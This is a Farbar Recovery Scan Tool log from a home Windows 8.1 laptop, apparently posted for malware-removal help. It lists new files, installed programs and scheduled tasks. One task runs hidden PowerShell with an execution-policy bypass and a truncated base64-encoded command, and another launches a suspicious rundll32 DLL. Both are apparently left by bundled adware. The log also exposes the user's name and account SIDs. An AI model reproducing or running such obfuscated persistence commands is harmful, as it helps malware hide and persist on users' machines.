2016-02-09 11:50 - 2016-02-06 00:54 - 01312256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-02-09 11:32 - 2016-01-10 09:50 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\cfgbkend.dll
2016-02-09 11:32 - 2016-01-10 09:31 - 00162304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msorcl32.dll
2016-02-09 11:32 - 2016-01-10 09:16 - 00898048 _____ (Microsoft Corporation) C:\Windows\system32\CPFilters.dll
2016-02-09 11:32 - 2016-01-10 09:14 - 00048640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cfgbkend.dll
2016-02-09 11:32 - 2016-01-10 09:12 - 00532480 _____ (Microsoft Corporation) C:\Windows\system32\EncDec.dll
2016-02-09 11:32 - 2016-01-10 08:58 - 00166400 _____ (Microsoft Corporation) C:\Windows\system32\mtxoci.dll
2016-02-09 11:32 - 2016-01-10 08:51 - 00702976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CPFilters.dll
2016-02-09 11:32 - 2016-01-10 08:49 - 00443392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\EncDec.dll
2016-02-09 11:32 - 2016-01-10 08:40 - 00116736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mtxoci.dll
2016-02-09 11:32 - 2015-12-29 07:45 - 07783936 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Data.Pdf.dll
2016-02-09 11:32 - 2015-12-29 07:45 - 07075328 _____ (Microsoft Corporation) C:\Windows\system32\glcndFilter.dll
2016-02-09 11:32 - 2015-12-29 07:43 - 05267968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\glcndFilter.dll
2016-02-09 11:31 - 2016-01-21 22:40 - 00571904 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-02-09 11:31 - 2016-01-21 22:29 - 06052352 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-02-09 11:31 - 2016-01-21 22:28 - 00108544 _____ (Microsoft Corporation) C:\Windows\system32\hlink.dll
2016-02-09 11:31 - 2016-01-21 22:27 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-02-09 11:31 - 2016-01-21 22:02 - 00496640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-02-09 11:31 - 2016-01-21 21:55 - 01032704 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2016-02-09 11:31 - 2016-01-21 21:52 - 00099328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hlink.dll
2016-02-09 11:31 - 2016-01-21 21:51 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-02-09 11:31 - 2016-01-21 21:50 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2016-02-09 11:31 - 2016-01-21 21:48 - 00718336 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2016-02-09 11:31 - 2016-01-21 21:48 - 00372224 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2016-02-09 11:31 - 2016-01-21 21:47 - 00798208 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-02-09 11:31 - 2016-01-21 21:46 - 02123264 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-02-09 11:31 - 2016-01-21 21:35 - 04611072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-02-09 11:31 - 2016-01-21 21:31 - 02597376 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-02-09 11:31 - 2016-01-21 21:31 - 00880128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2016-02-09 11:31 - 2016-01-21 21:28 - 02880000 _____ (Microsoft Corporation) C:\Windows\system32\actxprxy.dll
2016-02-09 11:31 - 2016-01-21 21:27 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2016-02-09 11:31 - 2016-01-21 21:25 - 00687104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-02-09 11:31 - 2016-01-21 21:25 - 00325632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2016-02-09 11:31 - 2016-01-21 21:24 - 02050560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-02-09 11:31 - 2016-01-21 21:08 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2016-02-09 11:31 - 2016-01-21 21:07 - 02120704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-02-09 11:31 - 2016-01-21 21:02 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2016-02-09 11:31 - 2016-01-19 11:14 - 07453024 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-02-09 11:31 - 2016-01-19 11:13 - 02175008 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2016-02-09 11:31 - 2016-01-19 11:13 - 01063464 _____ (Microsoft Corporation) C:\Windows\system32\WinTypes.dll
2016-02-09 11:31 - 2016-01-19 11:12 - 01737088 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-02-09 11:31 - 2016-01-19 11:12 - 01133744 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-02-09 11:31 - 2016-01-19 10:23 - 01564496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2016-02-09 11:31 - 2016-01-19 10:23 - 01501496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-02-09 11:31 - 2016-01-19 10:23 - 00548024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinTypes.dll
2016-02-09 11:31 - 2016-01-19 10:15 - 00246784 _____ (Microsoft Corporation) C:\Windows\system32\microsoft-windows-system-events.dll
2016-02-09 11:31 - 2016-01-19 09:30 - 00862720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-02-09 11:31 - 2016-01-19 08:37 - 00267776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wincorlib.dll
2016-02-09 11:31 - 2016-01-14 17:42 - 00033472 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2016-02-09 11:31 - 2016-01-14 12:44 - 01362944 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-02-09 11:31 - 2016-01-14 12:44 - 01162240 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-02-09 11:31 - 2016-01-14 12:44 - 00696320 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-02-09 11:31 - 2016-01-14 12:44 - 00677376 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-02-09 11:31 - 2016-01-14 12:44 - 00499200 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-02-09 11:31 - 2016-01-14 12:44 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-02-09 11:31 - 2016-01-10 09:02 - 00987648 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-02-09 11:31 - 2016-01-10 08:43 - 00801792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-02-09 11:31 - 2016-01-07 10:34 - 04175872 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-02-09 11:31 - 2016-01-06 10:25 - 00140800 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxdav.sys
2016-02-09 11:31 - 2015-12-29 07:42 - 05264384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Data.Pdf.dll
2016-02-09 11:31 - 2015-12-28 13:42 - 00713216 _____ (Microsoft Corporation) C:\Windows\system32\WinSync.dll
2016-02-09 11:31 - 2015-12-28 12:31 - 00578048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinSync.dll
2016-02-09 11:29 - 2015-12-17 10:29 - 00131584 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2016-02-09 11:29 - 2015-12-17 08:17 - 03547648 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2016-02-08 14:19 - 2016-03-04 00:19 - 00000091 _____ C:\Users\Fawn\AppData\Roaming\WB.CFG
2016-02-08 14:17 - 2016-02-08 14:17 - 00023206 _____ C:\Windows\System32\Tasks\{7D7F0447-7D0E-0B7A-7E11-7F7D0905110F}
2016-02-08 13:26 - 2016-02-08 13:26 - 00000013 _____ C:\Users\Fawn\.pluto.tv
2016-02-08 13:25 - 2016-02-08 13:25 - 00001547 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2016-02-08 13:25 - 2016-02-08 13:25 - 00000000 ____D C:\Users\Fawn\AppData\Local\PlutoTV
2016-02-08 13:24 - 2016-02-08 14:13 - 00000000 ____D C:\Program Files (x86)\Pluto TV
2016-02-08 13:20 - 2016-02-08 13:20 - 00000258 __RSH C:\ProgramData\ntuser.pol
2016-02-08 13:19 - 2016-02-08 14:16 - 00000000 ____D C:\Users\Fawn\AppData\Roaming\RebateAll
2016-02-08 13:19 - 2016-02-08 13:19 - 00003456 _____ C:\Windows\System32\Tasks\FawnPediatricianMercuriallyV2
2016-02-08 13:19 - 2016-02-08 13:19 - 00000000 ____D C:\Users\Fawn\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RebateAll
2016-02-08 13:19 - 2016-02-08 13:19 - 00000000 ____D C:\ProgramData\Unchecky
2016-02-08 13:18 - 2016-02-08 13:18 - 30510920 _____ C:\Users\Fawn\Downloads\MediaPlayerSetup [1].exe
2016-02-08 13:18 - 2016-02-08 13:18 - 00000000 ____D C:\Users\Public\Documents\Baidu
2016-02-08 13:18 - 2016-02-08 13:18 - 00000000 ____D C:\Users\Fawn\AppData\Local\IsolatedStorage
2016-02-08 13:15 - 2016-02-08 13:16 - 00970320 _____ (Software ) C:\Users\Fawn\Downloads\MediaPlayerSetup.exe
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2016-03-04 09:59 - 2015-11-23 22:44 - 00000918 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-03-04 09:13 - 2015-11-20 10:54 - 00003596 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-4258770641-917365270-2992294631-1001
2016-03-04 09:09 - 2014-11-20 20:42 - 00956476 _____ C:\Windows\system32\PerfStringBackup.INI
2016-03-04 09:09 - 2013-08-22 05:36 - 00000000 ____D C:\Windows\Inf
2016-03-04 09:03 - 2015-11-20 10:55 - 00000000 ___DO C:\Users\Fawn\OneDrive
2016-03-04 09:02 - 2015-11-23 22:44 - 00000914 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-03-04 09:02 - 2013-08-22 06:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-03-04 09:02 - 2013-08-22 06:44 - 00337976 _____ C:\Windows\system32\FNTCACHE.DAT
2016-03-04 09:02 - 2013-08-22 05:25 - 00262144 ___SH C:\Windows\system32\config\ELAM
2016-03-04 09:01 - 2013-08-22 05:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2016-03-04 05:29 - 2015-11-20 12:42 - 00003910 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{F9805CA2-ADB9-457B-9954-5CF8981F1431}
2016-03-03 20:04 - 2016-01-17 14:21 - 00000000 ____D C:\swsetup
2016-03-03 20:04 - 2015-01-19 03:46 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
2016-03-03 20:03 - 2015-06-21 14:14 - 00000000 ____D C:\Windows\Hewlett-Packard
2016-03-03 17:58 - 2015-11-20 11:26 - 00000000 ____D C:\Program Files\Common Files\AV
2016-03-03 17:49 - 2016-02-01 18:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-03-03 17:49 - 2016-02-01 18:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-03-03 17:46 - 2016-01-17 00:40 - 00000340 _____ C:\Windows\Tasks\HPCeeScheduleForFawn.job
2016-03-03 17:31 - 2016-01-17 00:40 - 00003152 _____ C:\Windows\System32\Tasks\HPCeeScheduleForFawn
2016-03-03 15:26 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\system32\NDF
2016-03-03 15:05 - 2015-06-21 13:59 - 07552760 _____ (Broadcom Corporation) C:\Windows\system32\Drivers\BCMWL63a.SYS
2016-03-03 15:05 - 2015-06-21 13:59 - 04155920 _____ (Broadcom Corporation) C:\Windows\system32\bcmihvsrv64.dll
2016-03-03 15:05 - 2015-06-21 13:59 - 03799080 _____ (Broadcom Corporation) C:\Windows\system32\bcmihvui64.dll
2016-03-03 15:05 - 2013-08-22 07:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-03-03 13:29 - 2015-11-20 10:47 - 00000000 ____D C:\Users\Fawn
2016-03-01 17:33 - 2013-08-22 07:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-03-01 17:33 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\AppReadiness
2016-02-27 19:16 - 2015-11-25 12:16 - 00000000 ____D C:\Users\Fawn\Desktop\kmart ips
2016-02-27 15:53 - 2013-08-22 07:20 - 00000000 ____D C:\Windows\CbsTemp
2016-02-27 15:52 - 2015-11-20 10:48 - 00000000 ___SD C:\Windows\SysWOW64\GWX
2016-02-27 15:52 - 2015-11-20 10:48 - 00000000 ___SD C:\Windows\system32\GWX
2016-02-26 23:51 - 2015-11-20 12:43 - 00003064 _____ C:\Windows\System32\Tasks\McAfeeLogon
2016-02-26 23:51 - 2015-11-20 12:43 - 00000000 ____D C:\Windows\System32\Tasks\McAfee
2016-02-25 18:48 - 2016-01-03 23:45 - 00000000 ____D C:\Users\Fawn\Desktop\family pics
2016-02-20 12:03 - 2015-11-23 22:45 - 00002239 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-02-20 12:03 - 2015-11-23 22:45 - 00002210 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-02-19 10:22 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\rescache
2016-02-16 16:18 - 2015-06-21 14:20 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2016-02-15 12:11 - 2015-11-20 10:52 - 00000000 ____D C:\Users\Fawn\AppData\Local\Hewlett-Packard
2016-02-12 21:01 - 2015-11-24 13:39 - 00000000 ____D C:\Windows\system32\appraiser
2016-02-12 21:01 - 2014-11-20 20:20 - 00000000 ____D C:\Program Files\Windows Journal
2016-02-11 09:57 - 2015-06-21 14:18 - 00000000 ____D C:\ProgramData\McAfee
2016-02-11 09:52 - 2015-11-20 11:26 - 00003348 _____ C:\Windows\System32\Tasks\McAfee Remediation (Prepare)
2016-02-10 11:42 - 2015-06-21 14:18 - 00000000 ____D C:\Program Files\Common Files\McAfee
2016-02-10 11:40 - 2013-08-22 07:36 - 00000000 ___HD C:\Windows\ELAMBKUP
2016-02-10 11:36 - 2015-06-21 14:18 - 00000000 ____D C:\Program Files (x86)\McAfee
2016-02-09 14:54 - 2015-11-30 19:04 - 00000000 ____D C:\Users\Fawn\Desktop\New folder
2016-02-09 11:58 - 2015-11-24 12:53 - 00000000 ____D C:\Windows\system32\MRT
2016-02-09 11:54 - 2015-11-24 12:52 - 146614896 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-02-08 13:19 - 2013-08-22 07:36 - 00000000 ___HD C:\Windows\system32\GroupPolicy
2016-02-08 13:19 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\SysWOW64\GroupPolicy
2016-02-03 10:54 - 2015-11-23 22:44 - 00003890 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2016-02-03 10:54 - 2015-11-23 22:44 - 00003654 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
==================== Files in the root of some directories =======
2016-02-08 14:19 - 2016-03-04 00:19 - 0000091 _____ () C:\Users\Fawn\AppData\Roaming\WB.CFG
Some files in TEMP:
====================
C:\Users\Fawn\AppData\Local\Temp\sqlite3.dll
==================== Bamital & volsnap =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
LastRegBack: 2016-02-19 09:37
==================== End of FRST.txt ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version:04-03-2016
Ran by Fawn (2016-03-04 10:06:35)
Running from C:\Users\Fawn\Desktop
Windows 8.1 Connected (X64) (2015-11-20 18:48:54)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-4258770641-917365270-2992294631-500 - Administrator - Disabled)
Fawn (S-1-5-21-4258770641-917365270-2992294631-1001 - Administrator - Enabled) => C:\Users\Fawn
Guest (S-1-5-21-4258770641-917365270-2992294631-501 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
AS: McAfee Anti-Virus and Anti-Spyware (Enabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB}
FW: McAfee Firewall (Enabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Broadcom 802.11 Wireless LAN Adapter (HKLM\...\Broadcom 802.11 Wireless LAN Adapter) (Version: - Broadcom Corporation)
Broadcom Bluetooth Drivers (HKLM\...\{0A1B4690-E176-4533-8058-939480AEE1D0}) (Version: 12.0.0.9870 - Broadcom Corporation)
Digital Coupon Printer (HKLM-x32\...\{2CDD20A5-DFDE-4AC0-97DD-F60B1196BF98}) (Version: 3.50.0.0 - Hopster, Inc. an Inmar company)
DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden
Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP Documentation (HKLM-x32\...\{C925BFCB-DB7B-486A-B551-D637E054FC02}) (Version: 1.1.0.0 - Hewlett-Packard)
HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.7745.4851 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{E959FD01-BD01-4CC4-9BB8-4EBE8309BF37}) (Version: 8.1.52.1 - HP)
HP Support Solutions Framework (HKLM-x32\...\{E2CB09C1-3C76-4395-BB47-50C066535CF8}) (Version: 12.0.30.473 - HP)
HP System Event Utility (HKLM-x32\...\{D17A3B70-B75E-4C49-83D6-C17DDF65B35F}) (Version: 1.3.4 - Hewlett-Packard Company)
HP Utility Center (HKLM\...\{403E9EFF-C4B4-4308-BA4E-7093B6BA03D5}) (Version: 2.5.5 - Hewlett-Packard Company)
HP Wireless Button Driver (HKLM-x32\...\{30B2D1D8-0A07-4B71-9553-0710C5D31E35}) (Version: 1.1.2.1 - Hewlett-Packard Company)
Intel(R) Dynamic Platform and Thermal Framework (HKLM-x32\...\FFD10ECE-F715-4a86-9BD8-F6F47DA5DA1C) (Version: 7.10.0.2210 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3925 - Intel Corporation)
Intel(R) Sideband Fabric Device Driver (HKLM-x32\...\C5A8BC6E-723A-4C0F-96E1-C426D1A4BCA9) (Version: 1.70.305.16316 - Intel Corporation)
Intel(R) Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1064 - Intel Corporation)
McAfee LiveSafe - Internet Security (HKLM-x32\...\MSC) (Version: 14.0.7080 - McAfee, Inc.)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Office Word Viewer 2003 (HKLM-x32\...\{90850409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Mozilla Firefox 44.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 44.0 (x86 en-US)) (Version: 44.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 44.0 - Mozilla)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.29081 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7339 - Realtek Semiconductor Corp.)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 18.1.20.0 - Synaptics Incorporated)
Tweaking.com - Registry Backup (HKLM-x32\...\Tweaking.com - Registry Backup) (Version: 3.3.1 - Tweaking.com)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0760D692-A784-43E7-85B8-2B2684E560A9} - System32\Tasks\Intel Security DAT Reputation (AMCore) Post DAT update endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\54.0\mcdatrep.exe [2016-02-11] (McAfee, Inc.)
Task: {1526BB02-27BD-49DA-9D1E-D83BEB7D5B25} - System32\Tasks\FawnPediatricianMercuriallyV2 => Rundll32.exe PloppingOccupancies.dll,main 7 1 <==== ATTENTION
Task: {1C937EA3-02C6-4411-B988-23A42DA8BCDB} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [2014-06-24] (Safer-Networking Ltd.)
Task: {240BB078-B706-4FBC-A966-315BD0CF04AA} - System32\Tasks\HPCeeScheduleForFawn => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard)
Task: {31080FF0-04D4-42FE-9F1D-C5931F761D09} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\platform\McUICnt.exe [2016-01-03] (McAfee, Inc.)
Task: {5036E1E6-0240-44BA-9846-5DCA42CFD3BC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater - Resources => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-02-17] (Hewlett-Packard)
Task: {5575AF6F-E83C-4C17-B6F8-7800F9BE18C7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-23] (Google Inc.)
Task: {5AA23701-E548-42E8-8807-A8AC6914BC39} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-01-12] (Hewlett-Packard Company)
Task: {5AE6EF17-0F12-4444-8255-89C8BB6E4628} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [2016-02-09] (Microsoft Corporation)
Task: {6546A02A-83CC-4FF5-902D-3014E7B66225} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Active Health Launcher => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-01-20] (Hewlett-Packard)
Task: {68378BB1-53EC-4C77-949B-C806FF502CEC} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [2014-06-24] (Safer-Networking Ltd.)
Task: {79A6644D-454B-49A9-96AD-F1815FE7CB01} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-23] (Google Inc.)
Task: {840D75F4-6B63-425A-9218-F311DA896CDD} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [2014-06-27] (Safer-Networking Ltd.)
Task: {855913D5-AD47-4E5E-AE26-9820E15453B9} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-12-21] (Hewlett-Packard Company)
Task: {868E6E9F-5088-428A-966A-08CA9064672B} - System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse => C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\54.0\mcdatrep.exe [2016-02-11] (McAfee, Inc.)
Task: {AAD4C20A-745E-4F5B-89C1-55960794CB50} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent
Task: {AB055FD9-966F-40AB-8ADD-5A7B473AEC55} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee Anti-Virus And Anti-Spyware\upgrade.exe [2015-11-03] (McAfee, Inc.)
Task: {B1FA90AE-9C36-4B18-AC74-D64135779166} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-12-21] (Hewlett-Packard Company)
Task: {B4EECBD3-45D1-444D-BF90-2D3EC12F2F7C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-02-17] (Hewlett-Packard)
Task: {D1CAD731-070B-4B9F-A9F9-1FB6BED3BDB1} - System32\Tasks\{7D7F0447-7D0E-0B7A-7E11-7F7D0905110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9444 more characters).
Task: {DF03C2BA-FAA1-40E7-BB74-12E596E53688} - System32\Tasks\McAfee\McAfee Idle Detection Task
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\HPCeeScheduleForFawn.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\Users\Fawn\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RebateAll\RebateAll.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://rebateall.com/activation2/?dp=0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0E
ShortcutWithArgument: C:\Users\Fawn\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\RebateAll.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://rebateall.com/activation2/?dp=0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0E
